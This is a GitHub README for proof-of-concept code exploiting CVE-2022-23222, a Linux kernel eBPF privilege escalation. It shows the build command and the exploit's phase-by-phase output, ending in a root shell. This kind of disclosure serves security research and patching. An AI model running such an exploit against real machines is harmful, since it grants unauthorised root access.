tr3ee/CVE-2022-23222

GitHub: tr3ee/CVE-2022-23222

Proof-of-concept code for CVE-2022-23222, a Linux kernel eBPF local privilege escalation vulnerability, which escalates from an unprivileged user to root.

Stars: 579 | Forks: 99

# CVE-2022-23222

Chinese writeup: https://tr3e.ee/posts/cve-2022-23222-linux-kernel-ebpf-lpe.txt

For educational/research purposes only. Use at your own risk.

## Build and run

```
$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# 退出
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done
```